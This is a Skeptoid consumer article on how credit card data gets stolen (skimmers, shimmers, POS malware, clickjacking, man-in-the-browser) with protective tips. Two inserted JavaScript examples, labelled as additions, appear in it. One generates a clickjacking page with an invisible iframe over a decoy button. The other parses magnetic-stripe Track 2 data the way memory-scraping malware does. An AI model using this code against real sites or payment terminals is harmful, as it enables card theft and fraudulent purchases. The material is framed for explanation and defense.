How Your Credit Card Got Stolen
Here are the most likely ways that your credit card got stolen, and how you can prevent it in the future.
by Brian Dunning
January 17, 2017
That moment when you see a bunch of weird charges on your credit card or bank statement: Cigars in Brazil? Airline tickets in Nigeria? A tank of gas in Las Vegas? Someone has obtained your credit or debit card number, and now you're going to have to suffer months of updating it with all your utilities and other vendors. How did these thieves get your card information? Was it something you did? Should you have done something differently? Today we're going to look at some of the most common ways credit card numbers are compromised, correct some popular misinformation, and point out a few tips to more secure charging habits.
For this show, we don't really differentiate between credit cards and debit cards. From the perspective of keeping card info secure, there's very little difference. Either is just as likely to show up in a large database of card data that some thief acquired and another thief purchased; that buyer is either making online charges in bulk, or printing up duplicate cards and selling and using those. What we're going to talk about today is how to minimize the chance of your card getting into that database in the first place.
One of the best known methods of stealing card numbers is a device called a skimmer. Skimmers are false card slot overlays affixed to the front of ATMs, gas pumps, or anywhere you might slide your credit, debit, or ATM card. They take their own read of your card's magnetic stripe as you slide it into the machine. While skimmers used to be clumsy and easy to spot, today the best skimmers are seamless; they often incorporate an entire replacement front panel so the ATM looks factory fresh. Many also include a PIN pad overlay that captures your PIN as you type it, and most that don't use a hidden camera installed overhead or nearby to watch you type it. Less familiar, harder to spot, and increasingly common, are "shimmers": paper-thin circuit boards slipped inside the chip reader slot, where they are invisible from outside. A shimmer sits between the card's chip and the terminal and records the data the two exchange. It cannot extract the chip's secret key, so it cannot produce a working chip clone, but the captured account data is still valuable for online fraud and has been used to make magnetic-stripe clones that some issuers failed to reject. Some skimmers and shimmers are retrieved by the thieves after collecting data for a time, and some transmit what they collect over Bluetooth or another wireless link, so the thief never has to return to the scene.
These days it's not very likely that a stolen database of card data came from an inside job at some financial institution. The payment card industry has something called PCI compliance, set by the PCI Security Standards Council. The Council maintains the PCI DSS, or Data Security Standard, which is (in the words of the PCI Compliance Guide's FAQ, listed in the references below) "a set of security standards designed to ensure that ALL companies that accept, process, store or transmit credit card information maintain a secure environment." The standard is rigorous, requiring a stringent set of both physical and electronic security measures: segmenting the network that handles card data, encrypting stored card numbers, never storing the security code or full magnetic-stripe data after a transaction is authorized, and so on. A merchant that genuinely maintains PCI compliance is, by any practical definition, a much safer place to use your card than one that doesn't. One caveat: compliance is assessed at a point in time, and large retailers that had passed an assessment have been breached within months of it, so treat compliance as a baseline rather than a guarantee. Whether a particular merchant is compliant isn't a matter of public record (the card brands do publish lists of validated service providers), but you can be sure that major online retailers like Amazon.com, and financial services companies like PayPal, are PCI compliant.
But independently achieving PCI compliance is far beyond the means of most small merchants. These companies usually go one of two ways. First, the safe way: they work with a third-party card vault and tokenization provider that is PCI compliant. When you use your card at one of these online merchants, you type the card number into a form on their checkout page (or, at a brick-and-mortar store, you swipe or dip your card at a terminal), but the card data never goes to the merchant's own servers; the form fields or the terminal send it directly to the provider, who stores it and actually processes the transactions. The merchant gets back a token to reference the card: a long, unique string that only that merchant can use, and that is worthless to anyone who steals the merchant's database. Since these merchants never hold the card data, buying from them with your card carries little risk to your card. The one remaining exposure is the checkout page itself: if an attacker plants malicious JavaScript on the merchant's site, it can copy what you type into the form before it ever reaches the provider, which is why a merchant using a tokenization provider still has to keep its own web site uncompromised.
The other way small merchants go is to simply take and process cards, and employ their own notions of security. Some merchant service providers will refuse to work with them, but others will, and often charge them a monthly fee that is essentially a fine for not being PCI compliant. This amount is usually a lot less than PCI compliance would cost them, so they do it. Whether your card is safe or not is a crapshoot. Fortunately the overwhelming majority of online transactions come from a small number of major merchants who are PCI compliant, so these sketchy merchants make up only a tiny slice of the total transaction volume.
There are a lot of people who say "Oh, I won't use my credit card online." Well, that's fine, and it's a good idea, inasmuch as never using or even having a credit card at all is the best possible defense. But probably most of these people carry their credit card around in their wallet or purse. They may even use it at restaurants or gas stations. Well, statistically, they happily use their credit card for all the riskiest behavior, and think they're somehow being safer by foregoing one of the safest behaviors. Using your credit card at a PCI compliant online merchant like Amazon.com is far, far, far safer than simply having your credit card in a wallet or purse that might be lost or stolen, or skimmed at every shop you visit. If you have a credit card, and only one choice of where to use it, choose online, not offline.
There are a lot of ways that your financial information online can be compromised that don't involve your credit card, and that unfairly contribute to distrust of online credit card use. This is a long, long list, and I don't really advise the layperson to try to learn about these, but rather to install security software from a top vendor such as Kaspersky Lab (totally not a paid endorsement, it's a genuine recommendation). To briefly describe a couple of these threats, and hopefully frighten you into protecting your computer, I'll talk about two.
One is called a "man-in-the-browser" attack. This is trojan horse software that arrives on your computer just like any other malware and installs itself as a browser extension, or hooks the browser's own code, so that it can read and modify certain web pages as you view them. It is usually targeted at specific bank or online payment web sites. If you try to make an online payment through your bank, the man-in-the-browser alters the payee and amount in the request it sends to the bank, so the bank receives something different from what you typed; it then rewrites the bank's responses so that what you see on screen is what you expect, for example a confirmation page that looks like you paid your utility bill, when the bank was actually instructed to send money to the thief, usually at some overseas bank. Because the browser itself is lying to you, nothing on the page can be trusted to verify anything; this is why banks confirm large transfers through a separate channel, such as a text message that repeats the payee and amount, which malware on your computer can't rewrite. There are many, many variations of this.
Another is called "clickjacking", and it is usually aimed at online payment or shopping sites that the attacker assumes many victims will be logged into. Unlike a man-in-the-browser, it needs nothing installed on your computer. The attacker builds a web page of his own and lures you to it, with a game, a prize, a video, anything that gets you to click. That page loads the targeted site inside an invisible frame, positioned precisely so that its "Buy Now" or "Donate Now" button sits directly under the thing you think you're clicking. Your browser delivers the click to the real site, with your real logged-in session, and the purchase or donation goes to the thief from your default payment method at whatever site was targeted. The defense belongs to the targeted site: it tells browsers not to display it inside other sites' frames, using the X-Frame-Options response header or the frame-ancestors directive of Content-Security-Policy. Sites that send neither are the ones clickjacking works against.
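The two halves of a clickjacking attack, as an added example that is not part of the original article: the page an attacker would host, and a check of a site's response headers that tells you whether browsers would let the site be framed at all (which is the whole precondition for the attack). The origins, header sets, and URLs are constructed for illustration; the header logic follows the published behaviour of `Content-Security-Policy: frame-ancestors` (which takes precedence when present) and `X-Frame-Options`.

```javascript
// Added example, not code from the article. It shows the two halves of
// clickjacking: the page an attacker hosts, and the response-header check
// that decides whether a site can be framed at all. All origins, headers
// and URLs below are constructed for illustration.

// The attacker's page: the real site (logged in as the victim) sits in an
// invisible iframe positioned exactly over a harmless-looking decoy button.
// The iframe is on top, so the click lands on the real site's button.
function buildClickjackPage(targetUrl, decoyLabel) {
  return `<!doctype html>
<style>
  #decoy  { position:absolute; top:100px; left:100px; z-index:1; }
  #victim { position:absolute; top:0; left:0; width:800px; height:600px;
            opacity:0; z-index:2; }
</style>
<button id="decoy">${decoyLabel}</button>
<iframe id="victim" src="${targetUrl}"></iframe>`;
}

// Case-insensitive header lookup over a plain { name: value } object.
function header(headers, name) {
  const key = Object.keys(headers).find(k => k.toLowerCase() === name);
  return key === undefined ? null : headers[key];
}

// Match one CSP source expression ('self', 'none', *, https://*.host, host)
// against the origin of the page doing the framing.
function sourceMatches(source, embedderOrigin, pageOrigin) {
  const src = source.replace(/^'|'$/g, '').toLowerCase();
  if (src === 'none') return false;
  if (src === 'self') return embedderOrigin === pageOrigin;
  if (src === '*') return true;
  const embedder = new URL(embedderOrigin);
  const [scheme, host] = src.includes('://') ? src.split('://') : [null, src];
  if (scheme !== null && scheme + ':' !== embedder.protocol) return false;
  if (host.startsWith('*.')) return embedder.host.endsWith(host.slice(1));
  return embedder.host === host;
}

// May a response from pageOrigin carrying these headers be framed by
// embedderOrigin? CSP frame-ancestors takes precedence when present;
// X-Frame-Options is the fallback; no header at all means anyone may frame.
function canBeFramed(headers, embedderOrigin, pageOrigin) {
  const csp = header(headers, 'content-security-policy');
  if (csp !== null) {
    const directive = csp.split(';').map(d => d.trim())
      .find(d => d.toLowerCase().startsWith('frame-ancestors'));
    if (directive !== undefined) {
      const sources = directive.split(/\s+/).slice(1);
      return sources.some(s => sourceMatches(s, embedderOrigin, pageOrigin));
    }
  }
  const xfo = (header(headers, 'x-frame-options') || '').trim().toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return embedderOrigin === pageOrigin;
  // Absent, or an obsolete value such as ALLOW-FROM that browsers ignore.
  return true;
}

// Constructed origins and header sets for a hypothetical payment site.
const PAGE = 'https://pay.example';
const ATTACKER = 'https://free-prizes.example';
const HEADER_SETS = {
  unprotected: {},
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  xfoSameOrigin: { 'x-frame-options': 'sameorigin' },
  csp: { 'Content-Security-Policy':
         "default-src 'self'; frame-ancestors 'self' https://*.partner.example" },
};

// Which of the header sets still lets the attacker's origin frame the page?
function report() {
  const out = {};
  for (const [name, headers] of Object.entries(HEADER_SETS)) {
    out[name] = canBeFramed(headers, ATTACKER, PAGE);
  }
  return out;
}

console.log(report()); // only "unprotected" is true
module.exports = { buildClickjackPage, canBeFramed, sourceMatches, report, HEADER_SETS, PAGE, ATTACKER };
```

Run it with `node` and only the `unprotected` header set comes back `true`. The same `canBeFramed` check, pointed at the real headers a site returns, is how a tester confirms a clickjacking finding before bothering to build the decoy page.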
The lesson to learn from these types of threats is that while you're right to be concerned about your credit card, you're wrong to think that simply avoiding use of your credit card online makes your finances a whole lot safer.
Much of the reason for that is that most retail point of sale systems run Windows and are connected to the Internet. As a result, they get infected with POS malware, and thieves design campaigns targeted at large retailers specifically. Once a major retailer's terminals are infected, the malware scrapes each terminal's memory for the moment the card data sits there unencrypted, grabbing the magnetic-stripe data (called Track 2 data: the card number, expiry date, and service code, plus the stripe's own verification value) that a terminal handles on every swipe. The three-digit security code printed on the back of the card is not on the stripe, so a memory scraper doesn't get that, but Track 2 data is enough to print a working counterfeit stripe card. Single campaigns of this kind have taken data from tens of millions of cards from one retailer. It is naive to believe that using your card online is more risky than using it in the brick and mortar world.
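What a skimmer reads off the stripe and what POS memory scrapers hunt for is the same Track 2 record, so here is an added example (not code from the article) that parses it the way both the malware and the defenders' detection signatures do. The record layout is the standard one (`;PAN=YYMMSSS...?`); the "memory snapshot" is a constructed string containing only well-known test card numbers, no real card data.

```javascript
// Added example, not from the article: detect and parse magnetic-stripe
// Track 2 records the way POS RAM scrapers and defenders' signatures do.
// Track 2 layout (ISO/IEC 7813): ;PAN=YYMMSSSdiscretionary?
// The "memory snapshot" below is constructed; the PANs are public test numbers.

const TRACK2_RE = /;?(\d{13,19})=(\d{2})(\d{2})(\d{3})(\d{0,30})\??/g;

// Luhn check: the same test a scraper uses to discard random digit runs.
function luhnValid(pan) {
  let sum = 0;
  let double = false;
  for (let i = pan.length - 1; i >= 0; i--) {
    let d = Number(pan[i]);
    if (double) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    double = !double;
  }
  return sum % 10 === 0;
}

// The service code tells a thief how the issuer expects the card to be used:
// first digit 2 or 6 means a chip is present; third digit 0, 3 or 5 means
// the issuer requires a PIN.
function describeServiceCode(code) {
  const chipPresent = code[0] === '2' || code[0] === '6';
  const pinRequired = ['0', '3', '5'].includes(code[2]);
  return { chipPresent, pinRequired };
}

// Keep first six and last four, as a forensic report would.
function maskPan(pan) {
  return pan.slice(0, 6) + '*'.repeat(pan.length - 10) + pan.slice(-4);
}

// Scan a buffer and return only records that look like real cards:
// regex shape, Luhn-valid PAN, and a sane expiry month.
function findTrack2(buffer) {
  const found = [];
  for (const m of buffer.matchAll(TRACK2_RE)) {
    const [, pan, yy, mm, serviceCode, discretionary] = m;
    const month = Number(mm);
    if (!luhnValid(pan) || month < 1 || month > 12) continue;
    found.push({
      pan: maskPan(pan),
      expires: `20${yy}-${mm}`,
      serviceCode,
      ...describeServiceCode(serviceCode),
      discretionaryLength: discretionary.length,
    });
  }
  return found;
}

// Constructed snapshot: two valid records, one Luhn failure, one bad month.
const SAMPLE_MEMORY = [
  'POSAPP.EXE heap ...',
  ';4111111111111111=25122011234567890?',
  'garbage 000111 ;4111111111111112=2501101? garbage',
  ';5555555555554444=24056011111?',
  ';4111111111111111=2513101?',
].join('\n');

console.log(findTrack2(SAMPLE_MEMORY)); // two records survive the checks
module.exports = { findTrack2, luhnValid, describeServiceCode, maskPan, SAMPLE_MEMORY };
```

The regex alone fires on plenty of noise in a real memory dump, which is why both the malware and a detection rule pair it with the Luhn check; a scraper that skipped it would ship garbage to its operator. Note the service code: a stripe record whose first digit says "chip present" is exactly what a counterfeiter tries to use at a terminal that hasn't been upgraded.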
So now, here are your 2017 Best Practices recommendations for credit and debit card users:
- When using an ATM, always choose an indoor machine over an outdoor machine. Thieves install skimmers on machines located in places where they can get away with it. Choose a built-in machine over a standalone machine. Be most careful on weekends and holidays when the skimmer installers know nobody's around.
- At any ATM or gas pump, give the machine a quick examination. Is there any loose plastic around the card slot, anything that doesn't appear to be original? Is there anything overhead that may have been stuck on, and may contain a camera? Is the slot tight, possibly indicating a shimmer?
- Whenever you put your card in and the terminal asks you "Debit or credit?", understand what the button does: pressing "credit" on a debit card doesn't turn it into a credit card, it just routes the transaction through the card network as a signature transaction instead of a PIN transaction. It doesn't affect the likelihood of your number being stolen. What does affect your liability is which kind of card you carry. In the United States, your liability for fraudulent charges on a credit card is capped at $50 by law, and the card networks usually reduce that to zero; you dispute the charge before you ever pay it. With a debit card, the money leaves your account immediately and you wait while the bank investigates, and your legal protection depends on how fast you report it: $50 if within two business days, up to $500 if within 60 days of your statement, and potentially your entire balance after that (see the FTC's "Lost or Stolen Credit, ATM, and Debit Cards" page in the references below). The card networks' zero-liability policies cover most debit transactions too and close much of that gap in practice, but they are policies rather than law, and none of them puts the money back in your checking account while the bank investigates. Pressing "credit" is harmless, but the choice that matters is to use an actual credit card for purchases.
- For your point of sale purchases, consider setting up Apple Pay, Android Pay, or Samsung Pay on your smartphone. Although no technology is 100% safe, these mobile wallets all use tokenization: when you enroll a card, the card network issues the phone a device-specific substitute number, so your actual card number is never stored on the phone or sent to the merchant. Each payment also carries a one-time cryptogram generated on the phone, so a token captured at a terminal can't be replayed for a second purchase, and the token is bound to your phone, so it can't be used from another device or typed into a web site. Mobile wallets are therefore safer than plastic cards at the point of sale, and, like your phone itself if you've set up proper password protection, they're useless to someone who physically steals the device.
- If you use a plastic card, make sure it's a chip card, also known as an EMV card. The chip holds a secret key that never leaves the card, and for every transaction it computes a one-time cryptogram over the transaction details (the amount, a random number from the terminal, and a transaction counter) that the issuing bank verifies before approving. A thief who records a chip transaction can't replay it, and can't forge a new one without the key, which is why chip cards have sharply reduced counterfeit-card fraud at chip terminals. What the chip does not do is hide your card number: the account number and expiry still pass to the terminal in the clear (unless the merchant encrypts them at the reader), so data captured from a chip transaction can still be used for online, card-not-present fraud, and the card's magnetic stripe is still there for thieves to skim at terminals that haven't been upgraded.
- Many cardholders have no reason to waste money on a special sleeve or wallet claimed to protect your card from being read remotely. A magnetic stripe can't be read without physical contact, and a contact chip has no antenna. Such protection only matters for contactless cards, the "tap to pay" cards branded PayWave, PayPass, and ExpressPay, which as of this writing haven't caught on much in the United States, though they're common in some other countries. Look for the wave-like contactless symbol on your card: a chip card without it is contact-only, while a card with it is a dual-interface EMV card that also has an antenna. These cards use NFC (Near Field Communication), a subset of RFID, normally read from distances under 5 cm, so in the real world such theft is almost unheard of, although researchers have demonstrated reads from 20 to 90 cm with purpose-built antennas. Even then, what a contactless read yields is limited: typically the card number and expiry, not the security code on the back, and the card answers a payment request with a one-time cryptogram rather than a static value that would let the reader make a working clone.
Of course there are many other avenues by which thieves get credit cards, including mugging you and taking it. You might type it into a web site over an insecure connection, you might fall for a phishing email prompting you to verify your credit card information. But no matter what you do, you'll never be 100% safe. Follow best practices, be as safe as is reasonable, and don't knock yourself out trying to prevent what is, for almost all of us, inevitable. Disputing some charges and getting a replacement card is not the end of the world.
Cite this article:
Dunning, B. "How Your Credit Card Got Stolen." Skeptoid Podcast. Skeptoid Media, 17 Jan 2017. Web. 16 Jul 2018. <http://skeptoid.com/episodes/4554>
References & Further Reading
El Issa, E. "How Your Credit Card Numbers Are Stolen." Credit Cards. NerdWallet, Inc., 22 Apr. 2015. Web. 8 Jan. 2017. <https://www.nerdwallet.com/blog/credit-cards/credit-card-numbers-stolen/>
FTC. "Lost or Stolen Credit, ATM, and Debit Cards." Consumer Information. Federal Trade Commission, 15 Dec. 2012. Web. 13 Jan. 2017. <https://www.consumer.ftc.gov/articles/0213-lost-or-stolen-credit-atm-and-debit-cards>
Krebs, B. "How Was Your Credit Card Stolen?" Krebs on Security. Brian Krebs, 19 Jan. 2015. Web. 8 Jan. 2017. <https://krebsonsecurity.com/2015/01/how-was-your-credit-card-stolen/>
PCI. "PCI FAQs." PCI Compliance Guide. ControlScan, 6 Apr. 2014. Web. 11 Jan. 2017. <https://www.pcicomplianceguide.org/pci-faqs-2/>
Penttinen, J. Wireless Payment and Access Systems, in Wireless Communications Security: Solutions for the Internet of Things. Chichester: John Wiley & Sons, 2016.
Schulz, M. "The Debit Card Danger You're Probably Forgetting." My Money. US News and World Report, 22 Sep. 2014. Web. 12 Jan. 2017. <http://money.usnews.com/money/blogs/my-money/2014/09/22/the-debit-card-danger-youre-probably-forgetting>
©2018 Skeptoid Media, Inc. All Rights Reserved.